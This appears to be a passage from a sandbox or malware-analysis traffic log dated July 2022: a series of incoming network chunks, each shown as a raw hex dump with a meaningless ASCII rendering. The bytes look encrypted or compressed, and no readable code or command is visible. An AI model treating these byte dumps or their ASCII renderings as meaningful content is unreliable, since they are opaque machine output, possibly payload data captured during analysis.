                                                                  2022-07-15 01:58:20 UTC1227INData Raw: 50 c2 82 16 e4 e1 66 68 e0 ab 65 f1 97 06 18 78 d9 6f c6 55 46 99 d5 95 2c b8 a1 40 a3 1c e0 df ed 61 51 2c 11 89 a1 e0 04 37 f5 41 4c 2b 59 d7 83 8e 89 b1 69 de 87 ab 29 98 0d cc 73 db ac 2d b9 ae 32 18 22 69 41 8a 5a 7b da bb 73 a4 67 ac 83 ea c0 09 17 e6 f5 70 98 ba 26 ef dc 3d e1 5c 55 7f cf 0c 55 7a ba 0d 63 36 5e 28 c2 70 34 28 74 9b 26 cb b8 23 a8 a3 fa 31 71 e4 66 b1 c5 9b 03 38 88 59 57 b6 75 3a 28 fa 54 e7 2f b7 10 8f 6b eb 16 84 e9 84 a4 7d 1c 35 08 a1 3d ac 20 5e 97 26 25 47 d5 6c ff 9d 9d 4c 03 46 c8 c9 fe 63 74 4e 22 bf e1 b2 b8 98 cd 34 5e a5 4e 55 59 65 d9 70 db ca 0c f6 a5 aa e0 b1 86 19 34 d0 84 e7 8b 2b cc a0 95 9d fb 3c d3 80 f1 7f e0 e9 81 74 22 ae 91 16 dc 10 7e cf 5b 2b 24 24 5a b7 19 c9 de 58 b9 e5 7a 2f 40 6a 27 a6 e0 42 42 f6 95
                                                                  Data Ascii: PfhexoUF,@aQ,7AL+Yi)s-2"iAZ{sgp&=\UUzc6^(p4(t&#1qf8YWu:(T/k}5= ^&%GlLFctN"4^NUYep4+<t"~[+$$ZXz/@j'BB
                                                                  2022-07-15 01:58:20 UTC1243INData Raw: 4f 22 b4 14 5f 8f 95 03 fb 91 9d b7 c4 7c 93 e0 9f 3b 5b 14 44 25 e2 c4 42 21 91 8a ea ac e2 43 ea 49 27 6c 16 42 dd 68 13 18 a0 c0 95 55 74 1a 31 48 5d 78 41 41 62 77 d2 5c 5f ee ce ad 54 b9 f3 dc 78 7a 92 e9 cc 4f f7 ae 60 36 5f 72 80 b6 fd a6 c8 38 ad cc fd 59 6a 16 b4 23 ec a7 aa fe 3d f3 7b 37 6c e9 11 10 55 2e 36 e3 f0 6c 32 13 aa 8d db 7c ed a7 e1 39 0f 74 04 57 c6 e8 3a 41 42 3e 20 22 97 b4 11 32 cc 20 08 92 39 0c 1d 7a c9 fb 03 78 7f 53 e5 0d aa 26 1a 12 99 94 30 f5 59 8b d0 52 05 47 38 c0 51 02 30 b7 ce 0f fb 64 f3 ad ab d6 28 e2 02 75 61 f4 47 5d 23 54 5d 04 7d 13 f4 30 ac 3c d5 34 0b 98 68 7c 9d 29 73 4a cc ba ad 57 ee ac 58 d8 cc 17 8a 16 f9 9d 06 b4 f0 16 a3 31 5c 7d b4 7e fa 22 83 22 d9 5e aa 62 c1 fd 95 75 ab 4b f6 16 81 9c 01 57 85 79 24
                                                                  Data Ascii: O"_|;[D%B!CI'lBhUt1H]xAAbw\_TxzO`6_r8Yj#={7lU.6l2|9tW:AB> "2 9zxS&0YRG8Q0d(uaG]#T]}0<4h|)sJWX1\}~""^buKWy$
                                                                  2022-07-15 01:58:20 UTC1259INData Raw: d6 40 25 b7 8b dd 68 30 5b af 7e d3 e0 fc 3f b4 d4 9c 8d 9e 0e fe cb fb 14 e4 d0 70 fd 3b b0 b6 8c 0b 90 ec 23 db 56 51 32 db 95 cb 0b 91 30 cd 75 92 91 ed 4c 7f 47 20 fb b3 f2 62 dc e8 4f 96 0a 0d b7 7d 71 65 2f 5e ef 5f 9f 71 00 c1 aa 60 1f 69 16 6c b1 56 91 7a 77 8b 0a 92 37 25 12 cf cf d9 22 68 5d 7c b6 26 ca f6 20 5c f9 03 ec 51 d8 1f 3b 75 1c 0f e3 92 47 0b 88 6f 17 b5 67 47 94 6b b6 20 bf ab da ac 49 ac 93 0e 11 d6 9a 46 a2 74 da 7f 47 29 33 0e 03 ab 4e a4 76 d7 c8 45 21 70 50 81 12 9a 13 8a 29 e1 39 ff 41 6c ae 46 28 f8 80 5c 9d 8c a3 24 2c 64 7d 4d 7a 05 87 e9 2c fb 13 ee b0 e7 88 ba 7a 54 d6 42 15 2b 47 50 11 ec 1d 63 7d 81 d5 ef b6 0f b7 44 79 5a 99 19 1b 9e 36 60 22 45 a6 9d de 39 b8 0a 2b 32 3e f9 e8 db 4b 26 06 d8 a7 37 a7 9f 0e c6 1a 3a 09
                                                                  Data Ascii: @%h0[~?p;#VQ20uLG bO}qe/^_q`ilVzw7%"h]|& \Q;uGogGk IFtG)3NvE!pP)9AlF(\$,d}Mz,zTB+GPc}DyZ6`"E9+2>K&7:
                                                                  2022-07-15 01:58:20 UTC1275INData Raw: 40 cd 29 48 a6 72 c8 85 d0 6a e8 4e d6 95 2a af 60 3e 92 9a 38 17 28 db 4f 98 8e bf b8 9b ed f9 77 b3 78 1b 3d 3e 08 30 28 e3 31 61 9c 73 ae d2 b5 a5 3c 40 a2 1b ab 50 1c fb 74 57 64 ba 94 9d 1e 5c 56 d1 e6 ae c8 2d 0a 81 74 5a 0a 6f 67 7f 09 bf 4a 9b b3 fe 92 b0 86 a2 a5 67 fe 8d 5a 3b 32 e0 1b 32 14 2e e3 76 07 56 49 c2 cd 36 ed e1 8d ac f5 64 86 80 2f 95 82 5c dd 81 77 e3 87 d5 c1 5a c4 e5 b0 38 46 57 ba 41 5e 01 5a b7 ad ed 49 21 11 6d 6c eb 99 89 3c cd 81 7d 5e 7c 86 50 56 69 c8 5a 41 d1 4c b3 6b 71 ae 9a b2 74 be 96 78 61 cb 33 83 f6 cb 5d f8 34 14 97 9a 12 73 73 4a 15 49 b1 82 22 71 89 90 01 81 fb 7f 55 b9 27 2a e0 26 c8 c6 0e 46 1b e6 55 ed 63 f5 ff 6c 9d 74 7c 6f bc 68 49 fe e2 88 6c bf 8a 0a fb 6a 7b 3f b2 fc 95 38 c5 e1 c0 16 50 e3 75 40 b7 ba
                                                                  Data Ascii: @)HrjN*`>8(Owx=>0(1as<@PtWd\V-tZogJgZ;22.vVI6d/\wZ8FWA^ZI!ml<}^|PViZALkqtxa3]4ssJI"qU'*&FUclt|ohIlj{?8Pu@
                                                                  2022-07-15 01:58:20 UTC1291INData Raw: 07 37 34 6b dc 9a 3f c5 2c 17 b1 7d 91 61 b6 e3 1b 35 b3 af 36 b7 07 a2 48 5c 0a 2d 92 12 0d d1 73 d6 82 4c 1c 31 9c bc fc 4e 32 3c 0e e0 cb 3f d1 d8 98 e1 75 d0 0c e0 b5 0f 80 96 b7 1f e3 0b 2b d1 33 f5 b0 f3 a8 4f 30 0a 01 00 1e 7d 04 6d de dc 8c e1 e1 f4 d5 50 a8 0e 65 18 4e c4 df 21 90 ce 6e 5f 33 ed 1d 32 d1 d6 92 82 27 08 c9 a5 2c e7 34 14 25 68 3a 73 a8 19 aa fc f2 ba 7b f0 2e e8 7f 79 26 fc ad 02 be b6 dd 06 f9 7f 98 3a be 6d 63 5e ee 6d 1d 98 b8 02 e9 e6 e5 38 4a c2 7e be 35 8d d8 9a e6 e3 e2 53 9f 01 ad b0 98 69 e7 4c 4c 81 e7 e5 ef aa 50 40 35 5e 3a 3f 2c db 81 db de 4f e2 90 9b a7 39 b1 68 b4 0f 77 c7 13 1f d0 5b 27 cc 8d 11 18 72 35 ea 18 2e 34 36 b9 ae c6 92 b3 e2 21 e5 f2 50 bb f0 05 58 a4 c6 6a 4c c7 5e c2 66 2d a9 51 f7 d1 a1 48 11 d3 19
                                                                  Data Ascii: 74k?,}a56H\-sL1N2<?u+3O0}mPeN!n_32',4%h:s{.y&:mc^m8J~5SiLLP@5^:?,O9hw['r5.46!PXjL^f-QH
                                                                  2022-07-15 01:58:20 UTC1307INData Raw: 13 f9 35 97 ef f9 e2 85 f5 0e b4 49 87 a3 16 95 77 c1 dd c5 11 cc dd 70 17 f4 58 18 72 21 30 c8 f1 d5 d4 e5 a3 66 0a c9 cb aa 8d 18 93 b7 08 19 13 c9 90 44 c4 13 fe 64 0d d8 1d 8e cd f3 f4 4f 4f b5 f8 9a 41 d8 fd 5e 0b d2 d0 6c 86 5a 5a b2 88 d2 1c f9 ac 14 5b aa 5a fc 2c 5f 23 68 52 7c 18 97 8b 29 c8 d5 6f 1f c0 3b e2 7a 06 84 09 a5 a4 5d d9 a4 64 10 4c 14 1a 7e 2c 4a 54 4a 4a 4e d7 89 76 04 ca 33 13 a7 9e 32 6b 12 c5 a3 55 65 f7 c0 ca 1a 56 fe 55 47 ba dd 36 f2 4c f9 bf 06 3d 6c c5 f6 0b 3e de 9a 37 80 21 25 19 ff e2 c2 88 0b e3 72 f0 e4 24 d4 42 d8 53 e6 24 91 d7 0e 5e 43 14 da f1 e3 0e 41 95 90 61 ae b1 99 cb 99 74 9c a5 e9 1b fc c2 27 4f 99 51 e4 d7 44 f1 c2 c5 f6 ce 33 b7 e0 d8 81 39 fd 81 e0 84 6c 62 c6 96 1d e7 3a d8 ab d3 a5 51 3d 29 8e 30 eb a2
                                                                  Data Ascii: 5IwpXr!0fDdOOA^lZZ[Z,_#hR|)o;z]dL~,JTJJNv32kUeVUG6L=l>7!%r$BS$^CAat'OQD39lb:Q=)0
                                                                  2022-07-15 01:58:20 UTC1323INData Raw: 30 a3 66 ea 33 82 dc 0b f7 a1 92 a6 27 29 6b 5f 86 29 4f 57 3d 09 27 6e 33 5a 7b a7 73 cb 58 19 12 d5 0c 38 8d c1 95 ba 2b 18 e4 a3 67 28 c4 13 92 ac b5 a0 cf 71 f5 6f 92 15 a2 aa 6d ef 96 5b 55 d1 52 66 c5 cc 46 dd 0b 6b ad 37 26 62 35 4e 6e 44 8a 6c 08 18 dc 05 c7 1d 07 62 a1 d3 90 41 95 08 e1 96 23 4b 25 8d 5b 17 19 de f7 98 c3 7d 39 df 97 52 99 05 f7 6b 4c 96 91 5f c7 74 f5 3b 68 a8 51 8b 10 fb 0a 01 30 76 9d d2 00 b7 ad 08 26 65 c3 a6 9a fc d8 05 84 8a 11 4e 11 fb 0b 69 a3 63 97 a1 da 06 fd dd fc 7b 6b 54 dd cb f5 80 8a 93 fa d7 cd dd f8 3c 3a 15 d6 b1 c7 2d e6 f1 04 9b 58 9c aa be 8a b5 5f eb c5 ae 71 ce 6c ee cd 56 52 21 16 54 b9 c1 1e 10 f5 79 ce 4d 2f b4 1e bb 8b f2 dd 5b 78 0c c2 2e d1 b2 76 b6 ca b4 78 74 9f a1 37 26 03 f2 40 1f 87 90 e2 3e 09
                                                                  Data Ascii: 0f3')k_)OW='n3Z{sX8+g(qom[URfFk7&b5NnDlbA#K%[}9RkL_t;hQ0v&eNic{kT<:-X_qlVR!TyM/[x.vxt7&@>
                                                                  2022-07-15 01:58:20 UTC1339INData Raw: 28 58 19 84 19 6e b2 d7 83 38 41 74 28 e1 08 2b 0d 2b ff 39 11 71 05 73 80 c3 d6 35 d0 aa 3a 2a 60 fd 00 48 1e 70 a3 c3 dc dd d5 90 81 3d 83 08 c5 06 a2 4d d4 fa a1 a3 12 95 b5 1e 6e b5 79 c6 c4 78 79 67 54 49 ec 08 07 2d 4b fd 1e ab f2 1a 65 05 24 4b a3 8d cb 15 6d e3 ba 66 d6 e6 bf bc db 97 9b 0e 1f 35 58 6d 0a da 7e 55 68 2b 30 50 28 e3 dd 40 e5 8d 38 20 55 ed cc 4f ea ad 73 a2 56 7b b1 2e eb 41 c8 48 37 5a 54 80 4f e8 7b 98 17 34 c1 bf aa 5d b0 b7 ac 16 b8 ca a4 46 21 5c 16 83 a8 76 d5 60 27 31 b6 ca 56 40 09 40 21 c8 2d 3e a4 31 a4 00 da 85 a1 b6 59 59 10 98 3f 00 1a b6 da 0e 26 ed 10 6c eb 19 39 86 8d bb a3 57 eb bc f7 81 95 56 91 51 56 e9 d8 95 b1 2a 84 e7 c1 68 46 9a 2e 73 2f 7a 79 85 a6 28 a3 e4 51 a6 97 74 03 9d 5c d5 94 e1 67 f1 9e 65 69 38 a6
                                                                  Data Ascii: (Xn8At(++9qs5:*`Hp=MnyxygTI-Ke$Kmf5Xm~Uh+0P(@8 UOsV{.AH7ZTO{4]F!\v`'1V@@!->1YY?&l9WVQV*hF.s/zy(Qt\gei8
                                                                  2022-07-15 01:58:20 UTC1355INData Raw: 8b 69 a5 f6 1a 2f c1 b7 48 33 17 4b 7f 2f 28 c4 43 fd 02 8b a1 1b 80 4d 93 4b ba 9c a4 53 e0 4b 8c a7 a5 c7 3b bc ab 06 80 09 33 07 56 88 a9 98 b3 2a 42 d0 99 31 87 5f 9e b0 09 7a 08 ae 13 ec e3 fc 32 bd 73 a4 3a 63 b8 45 43 33 fa 9c ae cb b4 fb b5 5d 04 cd 65 a0 ed cf b8 46 e3 4c a3 34 6a ff 69 19 eb e5 f3 05 8f 1d 89 e6 28 b4 ac 7e 03 c2 43 17 69 0b ea e4 1c 59 db b6 1a 70 54 12 58 7b 04 d1 77 0f 9a 29 b9 2b e8 a3 86 08 6c c7 7a 46 a8 c7 90 bc ac 32 5d 88 e4 1e 05 17 dc ff 77 d4 88 8f b2 42 ec b6 df ec 30 64 68 85 8f cd 5c 36 78 4c 02 26 4e b3 d5 5e 99 83 25 c9 1c 6f 89 4e f4 fd e1 12 ee 8f 19 b4 89 58 09 de b7 38 83 cb 08 b8 88 20 11 88 e2 30 05 05 37 dc fd e0 45 6c 48 0c c9 fd ec 18 ae 4b 53 d2 c6 55 cf ef 02 35 24 14 95 ee 99 10 b6 d4 aa 88 f8 49 ce
                                                                  Data Ascii: i/H3K/(CMKSK;3V*B1_z2s:cEC3]eFL4ji(~CiYpTX{w)+lzF2]wB0dh\6xL&N^%oNX8 07ElHKSU5$I
                                                                  2022-07-15 01:58:20 UTC1371INData Raw: 88 73 2a 9b 2a de 9e 9c 4d ad 0d 38 12 fe 88 9d de 15 90 ab fa 2b af 45 ee 57 33 32 f8 0c ad 46 5d 7c 17 3b a3 73 af db 08 0e 4e 72 55 9d 0a 6a 58 92 c1 3a 0d 0e d7 01 d3 d9 76 b3 48 05 db 60 2a a2 c3 8f a5 a5 91 11 3b bd 07 12 96 95 ec 04 21 86 28 f9 41 cc f1 3b 09 53 e8 05 d8 d4 f8 fd 9e 77 df f0 44 66 ba a1 29 39 ae 2a e2 b5 c6 ff d4 0d 7b 77 27 ab b0 88 b8 8f c9 29 9c eb d9 e8 24 db b2 54 17 42 50 86 52 41 57 0e 38 ec eb 60 eb 34 7a 6e b3 e1 f3 18 ce 7b fc 44 be 00 ab c0 02 a4 46 6f 0c 55 21 09 30 ae c7 aa 8a 20 4a 83 2b 7a 56 a7 35 70 f7 01 e0 97 ab 32 a9 d2 f5 c4 ba be 9c 17 74 fe 12 a2 68 83 83 35 1b 50 05 09 42 be 7b c5 1a b8 43 e7 b7 1c 67 8d eb 8d 57 3b b7 19 da b6 e9 50 53 54 f6 52 58 72 55 13 13 77 b1 a9 e6 61 ed 53 f9 21 7b 7b 97 44 62 7a cd
                                                                  Data Ascii: s**M8+EW32F]|;sNrUjX:vH`*;!(A;SwDf)9*{w')$TBPRAW8`4zn{DFoU!0 J+zV5p2th5PB{CgW;PSTRXrUwaS!{{Dbz
                                                                  2022-07-15 01:58:20 UTC1387INData Raw: c0 2a b1 81 bc 88 f2 58 9b 26 c4 8f cb fc a2 49 fb 26 9d cd c4 c6 9e f3 e1 9d b3 46 e4 df d9 6a e8 53 8c b0 71 56 31 6b 99 45 89 e9 b3 97 a6 f7 7e b2 0f a4 61 fa 2a 20 0f ad 35 5a 6b db a1 d3 da 03 83 3d e4 ad b1 18 8e f2 de 29 a8 13 12 d3 97 b1 3e 9e 83 41 a4 65 b3 8b 17 6d ae 5d 1f 94 fb 26 1a 47 f2 66 37 4e 7d e8 79 7a 2c bc a5 fb d2 7a a8 12 3f 70 ce c2 b1 1d 46 b1 cf cd 3c 08 fc ca 0d e2 de 3c a9 84 b3 94 83 c7 c4 cc d3 e4 40 74 50 ac ec b4 7c 98 6b 0a e2 55 5a c5 50 cf 52 56 b7 07 bd 16 65 aa 4b 42 a6 34 a0 bf 5c eb 28 05 f8 b2 6d 73 ca ea 2f 62 eb bb d1 2f e4 62 17 bf 0d 8d d9 61 a6 e8 89 59 c9 9a eb 68 b0 10 97 c5 3b e6 98 20 25 13 4e 32 07 c1 56 28 d8 0f 0e ad b0 da 05 cf cf 35 69 d6 ff e9 68 84 44 40 f8 32 5b 15 f4 ab 98 66 88 3e c3 28 0c e5 c4
                                                                  Data Ascii: *X&I&FjSqV1kE~a* 5Zk=)>Aem]&Gf7N}yz,z?pF<<@tP|kUZPRVeKB4\(ms/b/baYh; %N2V(5ihD@2[f>(
                                                                  2022-07-15 01:58:20 UTC1403INData Raw: c8 12 0d 2e 9d 9f dd 23 87 c7 99 27 7a c8 ea 92 c3 78 c7 68 bd 63 ab b2 4f 23 aa d7 30 63 7c a8 6b e9 01 82 8c 4e cc 6f 62 5c fd 26 e5 6c d6 e9 5a d7 15 be ca f1 a6 ae 37 b1 db 0c 57 2e b8 c6 5c cd 76 3c 89 26 dd 37 c3 7d a7 50 5e f2 50 8f a9 55 b8 3d 25 50 47 13 03 bf 94 bc c4 f5 40 f7 4c 11 c5 b3 6b e6 b9 36 cf b4 de 4c 0b 79 5e e8 5f 62 bd 76 43 4a be c8 07 69 37 f6 69 7c 7a 10 91 b4 84 c7 09 b4 e8 68 20 79 2b 7a 1b b7 0f 07 1b fd ed cd 3b b9 5d 98 7f 99 b8 1d 93 d8 d6 4f c0 23 12 fa 59 82 04 44 ed 55 dc cb f4 51 45 e9 86 85 53 4f b8 fd 07 23 31 d6 24 d7 6c 5f 47 bb 2c ba 37 14 e2 21 f7 29 cb 6b 19 5e b0 5a f0 90 3c 5f cf 4a 9b 2f e3 02 d2 5b 15 b9 11 8b 78 d5 a1 8a ed 1f fa 5d d6 87 46 52 e7 46 34 33 04 0a 1d d1 b5 4b 13 d8 da ef 79 06 70 2e 4e 1e 0c
                                                                  Data Ascii: .#'zxhcO#0c|kNob\&lZ7W.\v<&7}P^PU=%PG@Lk6Ly^_bvCJi7i|zh y+z;]O#YDUQESO#1$l_G,7!)k^Z<_J/[x]FRF43Kyp.N
                                                                  2022-07-15 01:58:20 UTC1419INData Raw: 2f f4 dd 81 cc e8 3a df 9a 17 f0 5e cf 56 7a 3b bb c6 bc d0 c9 25 0b d1 3b 99 a1 3c 0b 5a dd 8f e4 97 0c 06 fc 59 9d ab f6 ae ce 89 72 d6 02 e2 9d 3b cf 15 15 e1 3b d0 04 c2 6d dc 8c 33 c0 97 47 34 2f ef 0f 7b 0a 83 eb d0 56 f0 02 ac 77 ff 43 f7 64 4a e4 f5 26 bd 93 dd 3e 41 48 c7 e1 5e 62 0a b1 c1 ff 3d f3 0c ec 33 58 ea 6f 81 6b b7 53 60 2c 81 9b c1 89 31 c0 a1 0d 7a 1d 35 c3 55 65 e2 6e a3 7c 34 bd 29 24 0f e7 7e cf c8 96 fd 86 52 7f 32 b4 a0 f6 78 66 d0 b6 13 0e a1 80 fb 82 70 65 fe 83 88 67 8b c7 dc 67 84 5e 7b b2 8c 7f 12 9f f2 c0 03 7f 13 c5 0c ca b4 d4 d7 c0 de 2e 6e 6f 75 ff 14 a8 db 91 89 0c e0 e6 29 fd 56 62 06 04 63 b4 a1 c7 d8 60 f8 0b 16 d0 dd 48 e3 ae 5b ef 7e 6e 9a 5a eb dc 99 63 13 64 90 a6 57 0f 79 b8 3a ad 1f 5d 1a 77 03 ec 3e 0f ca 80
                                                                  Data Ascii: /:^Vz;%;<ZYr;;m3G4/{VwCdJ&>AH^b=3XokS`,1z5Uen|4)$~R2xfpegg^{.nou)Vbc`H[~nZcdWy:]w>
                                                                  2022-07-15 01:58:20 UTC1435INData Raw: e0 b5 bb 73 a6 15 93 c6 d7 9c 9b 9e 91 f2 4e 58 a8 14 6e 39 55 bc b6 24 01 a9 c5 a0 d3 ac d8 41 97 a5 d8 a3 73 f1 9a ff c9 53 f4 43 ce f6 a9 1d da 95 b5 10 d2 38 52 44 88 51 83 9b 98 63 fb 1b 86 7e 5a f2 d9 6b 19 14 45 fb f6 74 4c b9 6c 6a f3 c5 00 bd a1 96 4a c1 b6 f2 54 75 9e f9 4b 6f 44 31 6d e9 f4 7e ab a5 06 19 0a 46 e6 d4 11 98 3d df da 0d 69 6d b4 a6 85 80 11 35 73 b7 2a 2a e9 9e 1f 69 17 0a a1 d5 24 f1 63 53 f9 16 f4 ab c3 60 61 cc 0b f8 2c 54 76 a2 06 5b 29 9e bd c6 c0 18 03 80 38 9e 13 bc 23 14 69 b2 43 f0 b8 2e 8d 85 ab 72 3d 78 49 12 25 05 da 1b c2 57 ae 51 9a 35 78 10 3b 8f 49 69 a7 70 31 e5 07 4b aa 43 d4 6a 60 4a d7 10 8a 52 ab 17 49 f0 23 ee b7 bc a1 53 92 4c 1b 4a 4a 2f 0d 00 7f a7 e5 ed a8 35 55 51 bb 9c 43 65 d0 78 a8 f5 13 1c 6e 17 aa
                                                                  Data Ascii: sNXn9U$AsSC8RDQc~ZkEtLljJTuKoD1m~F=im5s**i$cS`a,Tv[)8#iC.r=xI%WQ5x;Iip1KCj`JRI#SLJJ/5UQCexn
                                                                  2022-07-15 01:58:20 UTC1451INData Raw: 43 9e 47 67 7a ab 16 98 b2 e7 4f ee 80 d7 ab ab 5a 87 08 57 90 85 7b 3c 07 62 d0 ef 9f 20 92 58 88 86 c9 57 bd 5b 3d 35 d5 a7 b7 fa f6 f5 dd ad c7 98 5e 28 ff cb 00 35 72 d9 b0 c1 06 bc 8d 37 ac a2 56 8c c9 f9 2c 24 53 d5 f3 95 e6 82 25 3c 02 eb 47 54 aa 59 75 92 7f c5 c4 bf 97 b7 a6 be b6 5d f9 7b 88 d9 c1 fb d1 a1 c7 53 f7 8e f4 4d 79 7e 60 cb 71 34 57 84 fc 6a a4 fe 33 d2 5e 07 80 4b 05 04 78 7b 30 8c aa 15 97 81 ae fb 98 5b 54 1b 6e 6a d9 81 d0 a1 d4 ba 8e 11 3e 01 9e 56 69 78 d7 cc 5f f9 55 1e 8c 04 59 0a e2 66 e9 ea e7 5f 97 22 aa 42 15 81 18 90 de 21 c8 af 31 2f 63 d4 ab 3a 5f 41 67 63 9c 2b 5b 52 2e 00 48 02 ad a8 68 90 03 91 d6 31 fe c7 0c fd 7d ba b7 5f 5b 2b fd 6c 91 4e 01 3f 6a d3 8b ce 6e 3b 86 d8 40 ba 45 d4 03 9a 98 46 01 0c 22 6d a0 1e 2e
                                                                  Data Ascii: CGgzOZW{<b XW[=5^(5r7V,$S%<GTYu]{SMy~`q4Wj3^Kx{0[Tnj>Vix_UYf_"B!1/c:_Agc+[R.Hh1}_[+lN?jn;@EF"m.
                                                                  2022-07-15 01:58:20 UTC1467INData Raw: 1e 4b ad 5a 3d a9 7c 6c 57 cf 81 10 ea 0e 35 ff 94 dc 85 97 3d 5f c0 2a 03 77 fb 55 93 31 37 59 35 bc 1d f9 3b 82 68 0b ed f4 3f 57 98 d8 79 2b 3e 87 fb 6f 12 5b 35 e0 db 67 33 e5 27 73 fc 70 c8 35 22 3c 5e 48 e9 67 99 8b cc 5b 2f a6 62 76 da ea 65 44 a5 0c ad 17 f8 82 23 c4 37 b9 d2 80 14 54 30 3a 74 fa 9b 57 a7 64 a3 52 82 1f 1d e1 43 5f 94 ef c4 32 91 c4 fc 93 64 ee e5 a8 66 92 e0 32 2e 67 97 e1 62 1d 7c 63 cc 8d 63 e3 b8 60 8f 99 ea 90 47 9b a1 05 86 e2 fe b5 21 8d ac 09 52 d8 dc 2c de 95 48 ff b8 d3 2b 46 2c 13 55 7f 11 71 70 be 3e 72 d2 2c 0c 3f 9e 5b 0a 04 05 88 23 70 02 dc eb dc df e1 6a a4 c1 6a 79 f4 60 8a fd 22 e9 c9 9f 7e 96 c8 83 a4 df c3 b8 18 03 bc df 85 f8 f8 26 19 f6 b8 21 71 4b 44 8b 99 b2 d8 9f a6 97 35 41 ec 6a 4a a1 fc 6c 2d 8f 1d 39
                                                                  Data Ascii: KZ=|lW5=_*wU17Y5;h?Wy+>o[5g3'sp5"<^Hg[/bveD#7T0:tWdRC_2df2.gb|cc`G!R,H+F,Uqp>r,?[#pjjy`"~&!qKD5AjJl-9
                                                                  2022-07-15 01:58:20 UTC1483INData Raw: da a3 ef a7 33 39 72 f6 a8 0e fe 12 3a cd 01 62 a4 28 43 e5 4d d8 dd 0b 65 c5 5c 6f 58 91 10 97 78 6b 97 ad f4 18 03 4d 4d e8 f9 88 a3 e7 54 bf 51 ee c2 78 ed 80 ab d8 64 27 ae 1b 94 29 90 f5 90 21 09 ce 99 48 89 f3 5b 2c 84 37 24 ce 78 71 da 9b 1c d4 9d ce 8e 1b 82 49 a4 0b 0a 97 4f 56 1b 52 c2 eb a0 a0 d4 a7 00 c4 2a bb 53 e5 5f e8 5b 05 34 56 3f a7 38 1a 45 10 26 c0 30 c7 6c 79 e0 f0 cc 6d 70 5e 35 ab 22 53 9a ac df 6a 67 a1 2b bf 92 7c 91 b4 66 fc 6b 4b d0 da 35 75 70 62 38 0d 29 dd 37 f8 1b 22 7d 08 70 03 15 d8 3a 47 70 44 a8 2c bf 58 4a 9c 6a 19 8e 41 74 6c b7 88 bb a5 70 1b 7c 69 ce a8 04 ee 72 94 b8 ea a2 1f 1b 0b 46 0b c9 f9 75 b4 87 f2 6b 3f 3a de 37 27 10 51 70 dd fe a0 40 9a a7 51 49 98 40 76 54 e7 1f a1 b4 f9 3a 94 f9 7e d5 0c 9c 06 e6 19 86
                                                                  Data Ascii: 39r:b(CMe\oXxkMMTQxd')!H[,7$xqIOVR*S_[4V?8E&0lymp^5"Sjg+|fkK5upb8)7"}p:GpD,XJjAtlp|irFuk?:7'Qp@QI@vT:~
                                                                  2022-07-15 01:58:20 UTC1499INData Raw: ec dd ab 92 bf 57 73 4e 50 ae 97 9d 8a 00 31 61 22 57 25 7f 6e e1 f3 79 1f 31 c0 58 d8 87 67 75 a4 04 ca 3c a9 1b c4 c7 f0 0c 9d 18 70 47 22 b5 3e c4 be 36 1b cd a8 37 7f a2 b9 f6 ef 0e eb 39 f0 b4 9f ff 7c d9 af 5d 46 6a e4 ac 11 db b6 f4 8d 77 79 6f b6 a2 d6 dd b8 fa 17 ec cb 3c 23 62 be d9 48 33 4c bf 56 0c 27 d2 3e 90 d4 3a 57 e2 f1 7b 33 90 39 e3 02 9f 2d 10 44 75 31 df 45 a5 e3 d2 26 5e 82 a0 82 7c 94 72 c9 a8 4f c6 7c 51 a8 2a 2a 2a f9 a8 97 92 6f 8a 5f ea e9 84 64 2b 2e fc 11 54 02 e5 a9 aa 86 21 36 27 8e 51 a1 1f f2 f7 31 0f 17 63 4e 3f 06 0e 83 86 a6 71 35 2b f8 b5 70 3b d6 fb e5 6e 50 af fc 1c 18 c3 cf c1 f2 32 5f 0c 7f 19 50 d3 e4 4f 4d 06 d0 01 a3 ad 30 58 df 80 3d b1 f9 1d 96 29 c0 aa 26 7d 2d d2 db 1d f3 5c b4 39 4c b2 58 0e 9a 31 8f 37 a8
                                                                  Data Ascii: WsNP1a"W%ny1Xgu<pG">679|]Fjwyo<#bH3LV'>:W{39-Du1E&^|rO|Q***o_d+.T!6'Q1cN?q5+p;nP2_POM0X=)&}-\9LX17
                                                                  2022-07-15 01:58:20 UTC1515INData Raw: 5e 9e 91 9e 4c 42 d6 57 f3 c8 6f 54 22 a0 38 bb 25 ab 2f 97 8a 77 d7 9b f8 c2 d8 e9 63 31 1f 34 73 c6 3e 83 d0 ce 01 04 7d 3f e7 43 d8 7e a9 5f a5 dc f3 c7 16 db 55 97 1e 18 14 a5 fe dd 7c e3 f8 7a 3f b3 80 d7 11 63 15 90 98 4f 3b 08 57 44 87 e9 96 35 42 ab 50 d0 4d c8 e3 68 72 27 5a 3e 92 1c 38 01 3b b6 75 8a f8 bd 78 9d fb 85 b2 6d c3 59 af f5 28 f8 79 6b d3 25 e1 ca be 2c a9 cf 65 c3 b0 b6 04 7b 72 19 53 d9 a0 5f 95 b3 9f 8e c7 0f 6f 52 39 66 4b 61 61 b9 57 ad b7 cb 15 f5 cb 8c 10 ad 1b b3 0a 51 c3 10 d4 d0 6b 3b 12 1f bd 37 95 ee 24 40 ea 62 2a 21 71 8b aa c7 c7 59 8a a4 5b b7 80 02 04 c3 89 2c d2 6c 09 35 3a 51 31 ce 68 de 32 77 9e ea 70 1a fb 9d 89 13 45 e1 69 b2 7f 7b a5 09 5d 4e f7 35 6c b3 88 40 5e d3 07 d0 b8 61 8a ab 57 51 32 9d 37 89 c2 45 26
                                                                  Data Ascii: ^LBWoT"8%/wc14s>}?C~_U|z?cO;WD5BPMhr'Z>8;uxmY(yk%,e{rS_oR9fKaaWQk;7$@b*!qY[,l5:Q1h2wpEi{]N5l@^aWQ27E&
                                                                  2022-07-15 01:58:20 UTC1531INData Raw: 7d 25 ad 4e 2c e7 2e a8 f8 e0 16 23 13 50 ae 3c 27 c1 3d 4f 97 b5 25 f1 5a aa 91 06 69 41 6b 54 6e 41 34 01 89 08 72 e1 6c e3 c0 22 91 a7 fc 56 9e 24 4d 9c 07 60 83 d8 3f 84 37 9e bf f5 97 e6 2b 81 5b 6b b9 78 86 74 49 b6 db 68 1c 0f a4 e7 12 9f 55 d6 e7 ae 18 b7 9d f2 cc 38 b7 da 74 54 5f d7 dd 8c 97 5f c7 ef d0 d5 4e 16 e5 38 ef 89 0e 51 09 f3 87 95 d7 74 8a f9 ea 36 e9 ee 3a de 01 5f 98 66 50 77 de af 0f 1e 70 8c 1f 95 cb 9b 9e 16 fa 98 e2 de ea 79 9a 02 d1 c4 24 19 85 3f 15 db 7a 0f ad 3a a8 f4 ef ac 3e 09 bb a7 42 4c f4 a2 e2 5a e7 77 6b 15 6f 30 cd 63 f1 33 89 d0 b2 08 1a 13 68 42 e2 3f dc a6 fe 23 